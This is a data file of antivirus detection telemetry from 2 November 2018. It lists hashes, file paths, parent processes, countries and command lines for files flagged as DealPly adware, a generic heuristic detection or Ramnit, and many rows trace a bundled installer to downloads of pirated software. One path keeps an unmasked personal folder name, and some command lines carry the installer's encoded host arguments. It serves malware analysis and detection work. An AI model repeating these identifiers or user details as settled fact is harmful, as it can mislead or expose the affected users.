  Row(detection=Row(filename='bg-appendix1500.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Canon\\IJ Manual\\CANON MP230 SERIES\\Indonesian\\BG\\Bg-Appendix1500.html', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='17d040a44dd8ac3bb9074686c0fa31a11f5470b8babc9e6ac3819e970f077e39', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T15:41:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skse_loader.exe', filepath='C:\\Users\\X\\Desktop\\Ablage\\skse_1_06_16\\skse_loader.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='17e26c7fc5bae6864a898278a4229b223706b7e2ab7b7ab543f0d06c46223503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Jxy+eO6QvUGP8fi7.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T15:56:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7146048\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\giiiiiii\\pós\\aTubeCatcher_0430893490.exe', parentsize=2344378, timestamp='2018-11-02T03:14:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8269062\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\setup_1011641170.exe', parentsize=2438412, timestamp='2018-11-02T13:10:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\LOCAL\\Temp\\tmp7990782\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-02T18:31:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\LOCAL\\Temp\\tmp7990782\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8269062\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:10:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7121431\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$140652,35478112,151552,C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\clipgrab-3.7.1-cgorg.exe\\\\\\" \\\\\\/SPAWNWND=$707E0 \\\\\\/NOTIFYWND=$608BA ', country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-AQEK0.tmp\\clipgrab-3.7.1-cgorg.tmp', parentsize=1164288, timestamp='2018-11-02T08:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6937173\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:32:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7981074\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:43:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp9958289\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:54:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7121431\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6937173\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Baixaki_JDownloader_2797843724.exe', parentsize=2292152, timestamp='2018-11-02T02:32:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9870243\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4159528\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-000105-83e39f66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d946e90\\AVSCAN-20181101-235553-5A2CC07B\\AVSCAN-20181102-000105-83E39F66', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp1221605\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP908~1\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\User\\Downloads\\Baixaki_aTube Catcher_3927752197.exe', parentsize=2292152, timestamp='2018-11-02T03:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP908~1\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:47:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\TMP908~1\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\User\\Downloads\\Baixaki_aTube Catcher_3927752197.exe', parentsize=2292152, timestamp='2018-11-02T03:47:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-000110-8484e364', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d946e90\\AVSCAN-20181101-235553-5A2CC07B\\AVSCAN-20181102-000110-8484E364', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9870243\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Baixaki_Chocolatier_2434021303.exe', parentsize=2134912, timestamp='2018-11-02T14:30:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000276f2', filepath='C:\\Windows\\Temp\\5f1f5a26-64d4-4ede-8d54-7fccfe113629\\tmp00000160\\tmp000276f2', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.942.11595\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T09:13:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1172221\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1172221\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-02T21:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1172221\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/host:bER0cFZrWwchHHV3U3kGEj0NZXpIbg4WLQpiOE5lDxcsVHllQTBNSgBUIihlcRAYNRl\\\\\\/bFpqFwMqTyUzaRwXFlssU3ksQj8WTSZaZGgUaklNJloDLEo7bXgjUBgLDTVgbjvQNA \\\\\\/RR \\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Adobe Photoshop CS2 Downloader - JalanTikus.exe', parentsize=2919016, timestamp='2018-11-02T21:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3831801\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp4381638\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:42:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3831801\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$407CE,19444300,139776,D:\\\\\\\\MaRielapc\\\\\\\\Downloads\\\\\\\\aTube_Catcher.exe\\\\\\" \\\\\\/SPAWNWND=$307DE \\\\\\/NOTIFYWND=$307BE ', country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-RV8RJ.tmp\\aTube_Catcher.tmp', parentsize=1191936, timestamp='2018-11-02T19:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp9259453\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:41:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp4381638\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/mnl', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Bit335D.tmp.exe', parentsize=2690240, timestamp='2018-11-02T00:42:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1379543\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\CorelDRAW X6 Full Version_4013876236.exe', parentsize=2409021, timestamp='2018-11-02T09:20:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6420073\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:36:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp9259453\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:41:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10116804\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-02T02:49:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10116804\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/ref:ZZR0c1+7WwQozHV0S6oHES7ebnxL8A0TJt9rfFSyCggy02l8XaEQUzTPdDZM4QRePN5oP1K5HV413CA7W6gXw+0 \\\\\\/host:ZiR0cVwLWwYrfHVqSggQDiNkfmtOAQkEYGJmaU8DF14qNC5tBXJoPmAGHU4sZ2krXxNHTid2N3QfAV4 \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\FFSetupLatest (2).exe', parentsize=1824904, timestamp='2018-11-02T02:49:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4159528\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\poweriso-6-7.exe', parentsize=3862600, timestamp='2018-11-02T15:27:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4159528\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\poweriso-6-7.exe', parentsize=3862600, timestamp='2018-11-02T15:27:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6002296\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\microsoft-office-2010_1500696195.exe', parentsize=2323968, timestamp='2018-11-02T19:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2581403\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-02T20:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2581403\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/RR \\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\age-of-mythology_1463970214_83e48837.exe', parentsize=2386718, timestamp='2018-11-02T20:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8085332\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Download IDM 6.30.10.rar_0200058725.exe', parentsize=2485340, timestamp='2018-11-02T11:16:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4090412\\MNNStubSetup.exe', filesize=576000, name='Adware/DealPly.halkg.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\/RSF \\/ppn:YyhwYgxaFRAiP211FM5W \\/mnl', country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\thehat_2706534182.exe', parentsize=2488913, timestamp='2018-11-02T17:59:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1947844\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\warcraft-iii-the-frozen-throne_3227721995.exe', parentsize=2323968, timestamp='2018-11-02T12:16:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4090412\\MNNStubSetup.exe', filesize=576000, name='Adware/DealPly.halkg.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-02T17:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-000200-8b3f8ebc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9d946e90\\AVSCAN-20181101-235553-5A2CC07B\\AVSCAN-20181102-000200-8B3F8EBC', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:03:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4974083\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:10:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7981074\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:VPluUxWrQDZtznaRkw \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.219\\Your File Is Ready To Download_3105795784.exe', parentsize=2409021, timestamp='2018-11-02T08:43:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp8350076\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:45:52Z'), dt=datetime.date(2018, 11, 2)),
